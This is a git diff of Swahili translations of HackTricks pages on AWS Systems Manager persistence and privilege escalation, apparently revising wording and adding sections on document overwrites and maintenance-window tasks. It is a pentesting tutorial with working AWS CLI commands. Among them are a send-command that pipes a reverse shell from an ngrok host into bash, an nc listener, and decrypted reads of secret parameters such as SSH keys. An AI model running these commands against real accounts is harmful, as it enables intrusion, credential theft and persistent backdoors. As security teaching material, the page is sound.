diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md
index 586cd855f..75c8d7264 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md
@@ -1,4 +1,4 @@
-# AWS - SSM Uendelevu
+# AWS - SSM Perssitence
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
@@ -10,9 +10,9 @@ Kwa maelezo zaidi angalia:
 ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
 {{#endref}}
 
-### Kutumia ssm:CreateAssociation kwa uendelevu
+### Kutumia ssm:CreateAssociation kwa persistence
 
-Muovu mwenye ruhusa **`ssm:CreateAssociation`** anaweza kuunda State Manager Association ili kutekeleza amri kiotomatiki kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa ziendeshwe kwa kipindi kilichowekwa, na hivyo kufaa kwa uendelevu wa aina ya backdoor bila vikao vya mwingiliano.
+Mshambulizi mwenye ruhusa **`ssm:CreateAssociation`** anaweza kuunda State Manager Association ili kutekeleza kiotomatiki amri kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa ili ziendeshwe kwa muda wa kawaida uliowekwa, na hivyo kuzipa matumizi ya persistence kama backdoor bila vikao vya mwingiliano.
 ```bash
 aws ssm create-association \
 --name SSM-Document-Name \
@@ -22,6 +22,56 @@ aws ssm create-association \
 --association-name association-name
 ```
 > [!NOTE]
-> Njia hii ya kudumu inafanya kazi mradi tu instance ya EC2 inasimamiwa na Systems Manager, SSM agent inakimbia, na mshambuliaji ana ruhusa ya kuunda associations. Haitegemei vikao vya kuingiliana wala idhini za wazi za `ssm:SendCommand`. **Muhimu:** parameter ya `--schedule-expression` (kwa mfano, `rate(30 minutes)`) inapaswa kuzingatia interval ya chini ya AWS ya dakika 30. Kwa utekelezaji wa papo hapo au wa mara moja, acha kabisa `--schedule-expression` — association itaendeshwa mara moja baada ya kuundwa.
+> Mbinu hii ya persistence hufanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inakimbia, na mshambuliaji ana permission ya kuunda associations. Haihitaji interactive sessions au explicit `ssm:SendCommand` permissions. **Important:** parameter ya `--schedule-expression` (kwa mfano, `rate(30 minutes)`) lazima izingatie minimum interval ya AWS ya dakika 30. Kwa utekelezaji wa mara moja au wa wakati mmoja, acha `--schedule-expression` kabisa — association itatekelezwa mara moja baada ya kuundwa.
 
+
+### `ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`)
+
+Mshambuliaji mwenye permissions **`ssm:UpdateDocument`** na **`ssm:UpdateDocumentDefaultVersion`** anaweza kuongeza privileges kwa kurekebisha documents zilizopo. Hii pia huruhusu persistence ndani ya hiyo document. Kwa vitendo mshambuliaji angehitaji pia **`ssm:ListDocuments`** ili kupata majina ya custom documents na ikiwa mshambuliaji anataka kuficha payload yake ndani ya document iliyopo **`ssm:GetDocument`** itakuwa muhimu pia.
+```bash
+aws ssm list-documents
+aws ssm get-document --name "target-document" --document-format YAML
+# You will need to specify the version you're updating
+aws ssm update-document \
+--name "target-document" \
+--document-format YAML \
+--content "file://doc.yaml" \
+--document-version 1
+aws ssm update-document-default-version --name "target-document" --document-version 2
+```
+Hati ya hapa chini ni mfano wa document ambao unaweza kutumika kuandika juu ya document iliyopo. Utahitaji kuhakikisha aina ya document yako inalingana na aina ya target documents ili kuepuka issues na innvocation. Document iliyo hapa chini, kwa mfano, itafanya kazi na examples za **`ssm:SendCommand`** na **`ssm:CreateAssociation`**.
+```yaml
+schemaVersion: '2.2'
+description: Execute commands on a Linux instance.
+parameters:
+commands:
+type: StringList
+description: "The commands to run."
+displayType: textarea
+mainSteps:
+- action: aws:runShellScript
+name: runCommands
+inputs:
+runCommand:
+- "id > /tmp/pwn_test.txt"
+```
+### `ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`)
+
+Mshambulizi aliye na ruhusa **`ssm:RegisterTaskWithMaintenanceWindow`** na **`ssm:RegisterTargetWithMaintenanceWindow`** anaweza kupandisha privilege kwa kwanza kusajili target mpya na maintenance window iliyopo kisha kusasisha kwa kusajili task mpya. Hii husababisha execution kwenye targets zilizopo, lakini inaweza kumruhusu mshambulizi ku-compromise compute zenye roles tofauti kwa kusajili targets mpya. Hii pia huruhusu persistence kwa sababu maintenance windows tasks hutekelezwa kwa interval iliyofafanuliwa awali wakati wa uundaji wa window. Kivitendo mshambulizi pia angehitaji **`ssm:DescribeMaintenanceWindows`** ili kupata maintenance window IDs.
+``` bash
+aws ec2 describe-instances
+aws ssm describe-maintenance-window
+aws ssm register-target-with-maintenance-window \
+--window-id "<mw-id>" \
+--resource-type "INSTANCE" \
+--targets "Key=InstanceIds,Values=<instance_id>"
+aws ssm register-task-with-maintenance-window \
+--window-id "<mw-id>" \
+--task-arn "AWS-RunShellScript" \
+--task-type "RUN_COMMAND" \
+--targets "Key=WindowTargetIds,Values=<target_id>" \
+--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \
+--max-concurrency 50 \
+--max-errors 100
+```
 {{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md
index de633c740..cb4fdf49a 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md
@@ -4,7 +4,7 @@
 
 ## SSM
 
-Kwa taarifa zaidi kuhusu SSM angalia:
+Kwa maelezo zaidi kuhusu SSM angalia:
 
 {{#ref}}
 ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,7 +12,7 @@ Kwa taarifa zaidi kuhusu SSM angalia:
 
 ### `ssm:SendCommand`
 
-Mshambuliaji mwenye ruhusa **`ssm:SendCommand`** anaweza **kutekeleza amri kwenye instances** zinazokimbia Amazon SSM Agent na **kudhoofisha IAM Role** inayokimbia ndani yake.
+Mshambuliaji mwenye ruhusa **`ssm:SendCommand`** anaweza **kutekeleza commands kwenye instances** zinazoendesha Amazon SSM Agent na **kudhibiti IAM Role** inayotekelezwa ndani yake.
 ```bash
 # Check for configured instances
 aws ssm describe-instance-information
@@ -23,7 +23,7 @@ aws ssm send-command --instance-ids "$INSTANCE_ID" \
 --document-name "AWS-RunShellScript" --output text \
 --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
 ```
-Iwapo unatumia mbinu hii kuinua ruhusa ndani ya EC2 instance ambayo tayari imevamiwa, unaweza kukamata rev shell mahali hapa kwa kutumia:
+Ikiwa unatumia mbinu hii ili kupandisha privilege ndani ya EC2 instance ambayo tayari imecompromise, unaweza tu kukamata rev shell locally kwa:
 ```bash
 # If you are in the machine you can capture the reverseshel inside of it
 nc -lvnp 4444 #Inside the EC2 instance
@@ -31,11 +31,11 @@ aws ssm send-command --instance-ids "$INSTANCE_ID" \
 --document-name "AWS-RunShellScript" --output text \
 --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
 ```
-**Athari Inayowezekana:** Privesc ya moja kwa moja kwa EC2 IAM roles zilizoambatishwa kwa instances zinazoendesha SSM Agents.
+**Athari Inayowezekana:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
 
 ### `ssm:StartSession`
 
-Mshambulizi mwenye ruhusa **`ssm:StartSession`** anaweza **kuanzisha kikao kinachofanana na SSH katika instances** zinazoendesha Amazon SSM Agent na **kupata udhibiti wa IAM Role** inayokimbia ndani yake.
+Mshambuliaji mwenye ruhusa **`ssm:StartSession`** anaweza **kuanzisha session inayofanana na SSH katika instances** zinazoendesha Amazon SSM Agent na **kuathiri IAM Role** inayoendeshwa ndani yake.
 ```bash
 # Check for configured instances
 aws ssm describe-instance-information
@@ -45,25 +45,25 @@ aws ssm describe-sessions --state Active
 aws ssm start-session --target "$INSTANCE_ID"
 ```
 > [!CAUTION]
-> Ili kuanza kikao unahitaji **SessionManagerPlugin** imewekwa: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
->
-> **Athari Inayowezekana:** Privesc ya moja kwa moja kwa EC2 IAM roles zilizounganishwa na instances zinazoendesha na SSM Agents.
->
-> #### Privesc kwa ECS
->
-> When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\
-> Kulingana na [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) hii inafanywa kwa kuunda chaneli salama kati ya kifaa unachotumia kuanzisha amri ya “_exec_” na container lengwa kwa kutumia SSM Session Manager. (SSM Session Manager Plugin inahitajika ili hii ifanye kazi)\
-> Kwa hivyo, watumiaji walio na `ssm:StartSession` wataweza **kupata shell ndani ya ECS tasks** ikiwa chaguo hilo limewezeshwa kwa kukimbia tu:
+> Ili kuanzisha session unahitaji **SessionManagerPlugin** ikiwa imewekwa: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
+
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+
+#### Privesc to ECS
+
+Wakati **ECS tasks** zinaendeshwa na **`ExecuteCommand` enabled** users wenye permissions za kutosha wanaweza kutumia `ecs execute-command` ili **execute a command** ndani ya container.\
+Kulingana na [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) hii inafanywa kwa kuunda secure channel kati ya device unayotumia kuanzisha “_exec_“ command na target container kwa kutumia SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\
+Hivyo, users wenye `ssm:StartSession` wataweza **get a shell inside ECS tasks** zikiwa na option hiyo enabled kwa kuendesha tu:
 ```bash
 aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
 ```
 ![](<../../../images/image (185).png>)
 
-**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa `ECS`IAM roles zilizoambatishwa kwenye running tasks zilizo na `ExecuteCommand` imewezeshwa.
+**Athari Inayowezekana:** Privesc ya moja kwa moja kwa `ECS`IAM roles zilizoambatishwa kwa running tasks zilizo na `ExecuteCommand` enabled.
 
 ### `ssm:ResumeSession`
 
-Mshambuliaji aliye na ruhusa **`ssm:ResumeSession`** anaweza re-**start a SSH like session in instances** zinazokimbia Amazon SSM Agent zikiwa na hali ya kikao cha SSM **disconnected** na **compromise the IAM Role** inayokimbia ndani yake.
+Shambulizi mwenye permission **`ssm:ResumeSession`** anaweza ku-**re-start a SSH like session in instances** zinazokiendesha Amazon SSM Agent zikiwa na hali ya **disconnected** ya SSM session na **kucompromise IAM Role** inayokimbia ndani yake.
 ```bash
 # Check for configured instances
 aws ssm describe-sessions
@@ -72,30 +72,30 @@ aws ssm describe-sessions
 aws ssm resume-session \
 --session-id Mary-Major-07a16060613c408b5
 ```
-**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa EC2 IAM roles zilizoambatanishwa na instances zinazoendesha zenye SSM Agents na sessions zilizokatika.
+**Athari Inayoweza Kutokea:** Direct privesc kwa EC2 IAM roles zilizounganishwa na running instances zenye SSM Agents zinazofanya kazi na disconected sessions.
 
 ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)
 
-An attacker mwenye ruhusa zilizotajwa ataweza kuorodhesha **SSM parameters** na **kusoma kwa clear-text**. Kwenye parameters hizi mara nyingi unaweza **kupata taarifa nyeti** kama SSH keys au API keys.
+Mshambuliaji mwenye permissions zilizotajwa ataweza kuorodhesha **SSM parameters** na **kuzisoma kwa clear-text**. Katika parameters hizi unaweza mara nyingi **kupata sensitive information** kama SSH keys au API keys.
 ```bash
 aws ssm describe-parameters
 # Suppose that you found a parameter called "id_rsa"
 aws ssm get-parameters --names id_rsa --with-decryption
 aws ssm get-parameter --name id_rsa --with-decryption
 ```
-**Potential Impact:** Pata taarifa nyeti ndani ya vigezo.
+**Athari Inayowezekana:** Pata taarifa nyeti ndani ya parameters.
 
 ### `ssm:ListCommands`
 
-Mshambulizi mwenye ruhusa hii anaweza kuorodhesha **amri** zote zilizotumwa na, kwa matumaini, kupata **taarifa nyeti** ndani yao.
+Mshambulizi aliye na ruhusa hii anaweza kuorodhesha **commands** zote zilizotumwa na kwa matumaini apate **taarifa nyeti** ndani yake.
 ```
 aws ssm list-commands
 ```
-**Athari Inayoweza Kutokea:** Kupata taarifa nyeti ndani ya command lines.
+**Athari Inayowezekana:** Pata taarifa nyeti ndani ya command lines.
 
 ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)
 
-Mshambuliaji mwenye ruhusa hizi anaweza kuorodhesha zote **commands** zilizotumwa na **kusoma output** iliyotolewa, akiwa na matumaini ya kupata **taarifa nyeti** ndani yake.
+Mshambuliaji mwenye permissions hizi anaweza kuorodhesha **commands** zote zilizotumwa na **kusoma output** iliyozalishwa, kwa matumaini ya kupata **taarifa nyeti** ndani yake.
 ```bash
 # You can use any of both options to get the command-id and instance id
 aws ssm list-commands
@@ -103,11 +103,11 @@ aws ssm list-command-invocations
 
 aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
 ```
-**Athari Inayoweza Kutokea:** Pata taarifa nyeti ndani ya matokeo ya mistari ya amri.
+**Athari Inayowezekana:** Pata taarifa nyeti ndani ya output ya command lines.
 
 ### Kutumia ssm:CreateAssociation
 
-Mshambuliaji mwenye ruhusa **`ssm:CreateAssociation`** anaweza kuunda State Manager Association ili kutekeleza amri kiotomatiki kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa zifanye kazi kwa vipindi vilivyowekwa, zikifanya ziwe zenyefaa kwa backdoor-like persistence bila interactive sessions.
+Attacker mwenye permission **`ssm:CreateAssociation`** anaweza kucreate State Manager Association ili automatically execute commands kwenye EC2 instances zinazosimamiwa na SSM. Hizi associations zinaweza kusanidiwa ku run kwa fixed interval, jambo linalozifanya zinafaa kwa backdoor-like persistence bila interactive sessions.
 ```bash
 aws ssm create-association \
 --name SSM-Document-Name \
@@ -117,11 +117,60 @@ aws ssm create-association \
 --association-name association-name
 ```
 > [!NOTE]
-> Njia hii ya persistence hufanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inafanya kazi, na mshambuliaji ana ruhusa ya create associations. Haitegemei interactive sessions wala ruhusa wazi za ssm:SendCommand. **Muhimu:** Parameter ya `--schedule-expression` (kwa mfano, `rate(30 minutes)`) lazima iheshimu muda wa chini wa AWS wa dakika 30. Kwa utekelezaji wa haraka au mara moja, usitumie kabisa `--schedule-expression` — association itatekelezwa mara moja baada ya uundaji.
+> Njia hii ya persistence hufanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inafanya kazi, na attacker ana permission ya ku create associations. Haihitaji interactive sessions au explicit ssm:SendCommand permissions. **Important:** Parameter `--schedule-expression` (k.m. `rate(30 minutes)`) lazima iheshimu minimum interval ya AWS ya dakika 30. Kwa immediate au one-time execution, acha `--schedule-expression` kabisa — association itatekelezwa mara moja baada ya creation.
 
+### `ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`)
+
+Attacker aliye na permissions **`ssm:UpdateDocument`** na **`ssm:UpdateDocumentDefaultVersion`** anaweza ku escalate privileges kwa kurekebisha existing documents. Hii pia inaruhusu persistence ndani ya document hiyo. Kwa vitendo attacker pia angehitaji **`ssm:ListDocuments`** ili kupata majina ya custom documents na kama attacker anataka ku obfuscate payload yake ndani ya existing document **`ssm:GetDocument`** itakuwa necessary pia.
+```bash
+aws ssm list-documents
+aws ssm get-document --name "target-document" --document-format YAML
+# You will need to specify the version you're updating
+aws ssm update-document \
+--name "target-document" \
+--document-format YAML \
+--content "file://doc.yaml" \
+--document-version 1
+aws ssm update-document-default-version --name "target-document" --document-version 2
+```
+Hapa chini ni mfano wa document unaoweza kutumika ku-overwrite document iliyopo. Utahitaji kuhakikisha aina ya document yako inalingana na aina ya document lengwa ili kuepuka issues na innvocation. Document hapa chini kwa mfano itakuwa na mfano wa **`ssm:SendCommand`** na **`ssm:CreateAssociation`**.
+```yaml
+schemaVersion: '2.2'
+description: Execute commands on a Linux instance.
+parameters:
+commands:
+type: StringList
+description: "The commands to run."
+displayType: textarea
+mainSteps:
+- action: aws:runShellScript
+name: runCommands
+inputs:
+runCommand:
+- "id > /tmp/pwn_test.txt"
+```
+### `ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`)
+
+Mshambuliaji mwenye ruhusa **`ssm:RegisterTaskWithMaintenanceWindow`** na **`ssm:RegisterTargetWithMaintenanceWindow`** anaweza kuongeza privileges kwa kwanza kusajili target mpya kwenye maintenance window iliyopo kisha kusasisha kwa kusajili task mpya. Hii inafanikisha execution kwenye existing targets, lakini inaweza kumruhusu mshambuliaji ku-compromise compute zenye roles tofauti kwa kusajili new targets. Hii pia huruhusu persistence kwa sababu maintenance windows tasks zina-execute kwa interval iliyofafanuliwa awali wakati wa uundaji wa window. Kivitendo mshambuliaji pia angehitaji **`ssm:DescribeMaintenanceWindows`** ili kupata maintenance window IDs.
+``` bash
+aws ec2 describe-instances
+aws ssm describe-maintenance-window
+aws ssm register-target-with-maintenance-window \
+--window-id "<mw-id>" \
+--resource-type "INSTANCE" \
+--targets "Key=InstanceIds,Values=<instance_id>"
+aws ssm register-task-with-maintenance-window \
+--window-id "<mw-id>" \
+--task-arn "AWS-RunShellScript" \
+--task-type "RUN_COMMAND" \
+--targets "Key=WindowTargetIds,Values=<target_id>" \
+--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \
+--max-concurrency 50 \
+--max-errors 100
+```
 ### Codebuild
 
-Unaweza pia kutumia SSM kuingia ndani ya mradi wa codebuild unaojengwa:
+Unaweza pia kutumia SSM kuingia ndani ya codebuild project inayojengwa:
 
 {{#ref}}
 ../aws-codebuild-privesc/README.md